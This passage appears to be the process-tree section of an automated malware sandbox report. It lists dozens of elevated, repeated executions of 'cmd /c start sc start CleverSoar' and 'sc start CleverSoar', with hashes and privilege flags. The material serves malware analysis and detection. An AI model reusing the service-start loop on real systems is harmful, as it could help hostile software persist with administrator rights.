                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:39
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:40
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:41
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:42
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:43
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:44
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:45
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:46
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:47
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:48
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:49
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:50
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:51
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:52
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:53
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:54
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:55
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:56
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:57
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:58
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:59
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:60
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:61
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:62
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:63
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:64
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:65
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:66
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:67
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:68
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:69
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:70
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:71
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:72
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:73
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:74
                            Start time:07:03:16
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:75
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:76
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:77
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:78
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:79
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:80
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:81
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:82
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:83
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:84
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:85
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:86
                            Start time:07:03:17
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:87
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:88
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:89
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:90
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:91
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:92
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:93
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:94
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:95
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:96
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:97
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:98
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:99
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:100
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:101
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:102
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:103
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:104
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:105
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:106
                            Start time:07:03:18
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:107
                            Start time:07:03:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
